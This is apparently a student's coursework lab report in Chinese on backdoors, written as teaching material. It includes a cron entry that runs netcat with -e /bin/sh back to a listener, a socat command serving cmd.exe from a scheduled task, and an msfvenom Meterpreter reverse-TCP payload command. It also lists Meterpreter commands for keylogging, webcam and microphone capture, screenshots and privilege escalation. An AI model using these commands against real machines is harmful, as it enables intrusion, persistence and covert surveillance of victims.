20155227《网络对抗》Exp2 后门原理与实践
基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
在非官方网站下载软件时,后门很可能被捆绑在软件中。
攻击者利用欺骗的手段,通过发送电子邮件或者文件,并诱使主机的操作员打开或运行藏有木马程序的邮件或文件,这些木马程序就会在主机上创建一个后门。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
- Linux下可以通过cron来启动
- Windows下在控制面板的管理工具中可以设置任务计划启动,或者通过修改注册表来达到自启的目的;
(3)Meterpreter有哪些给你映像深刻的功能?
- 获取摄像头以及对靶机直接截屏,感觉很方便很厉害的样子
(4)如何发现自己有系统有没有被安装后门?
- 用杀毒软件进行扫描。
- 检查端口和进程。
实验准备(常用后门工具实践)
Windows获得Linux Shell
在
Windows
下查看ip
windows
打开监听
Linux
反弹连接win
windows
下获得一个linux shell
,可运行任何指令
Linux获得Win Shell
Linux
运行监听指令
Windows
反弹连接Linux
Linux
下看到Windows
的命令提示
nc传输数据
如图:
实验内容及过程
1.使用netcat获取主机操作Shell,cron启动
在
Windows
系统下,监听5227端口。
- 用
crontab -e
指令编辑一条定时任务,在最后一行添加50 * * * * /bin/netcat 192.168.56.1 5227 -e /bin/sh
时间到了之后获得了
kali
的shell
,可以输入指令。
2.使用socat获取主机操作Shell, 任务计划启动
在
Windows
系统下,打开控制面板->管理工具->任务计划程序
,创建任务,填写任务名称后,新建一个触发器:
在操作->程序或脚本中选择你的
socat.exe
文件的路径,在添加参数一栏填写tcp-listen:5227 exec:cmd.exe,pty,stderr
运行刚刚创建的任务:
在kali中输入指令
socat - tcp:192.168.56.1:5227
,此时可以发现已经成功获得了一个cmd shell
:
3.使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.115.128 LPORT=5227 -f exe > 20155227_backdoor.exe
- 将生成的后门程序复制到Windows主机上,也可以通过
nc
指令将生成的后门程序传送到Windows
主机上 在
Kali
上使用msfconsole
指令进入msf
控制台,使用监听模块,设置payload
,设置反弹回连的IP和端口
:
- 打开
Windows
上的后门程序 此时
Kali
上已经获得了Windows
主机的连接,并且得到了远程控制的shell
:
4.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
使用
help
查看指令
使用
record_mic
指令截获一段音频:
使用
webcam_snap
指令使用摄像头进行拍照:
使用
screenshot
指令可以进行截屏:
使用
keyscan_start
指令开始记录下击键的过程,使用keyscan_dump
指令读取击键的记录:
使用
getsystem
指令进行提权,提权失败(win10):
使用
sysinfo
查询电脑系统详细版本信息:
实验过程中遇到的问题及解决
问题:在设置
payload
过程中出现Handler failed to bind to XXX
的错误。
解决:我在生成后门程序时不小心使用的是
Windows
的ip地址,改为kali
的ip(相应的设置也改为kali的ip)之后问题解决。
实验体会
这次的实验非常有意思,使用MSF的时候,录音、截屏、照相、获取击键记录的实践让我在感到神奇的同时,也意识到我们的系统是很脆弱的。要保护好自己的隐私,就要提高安全意识。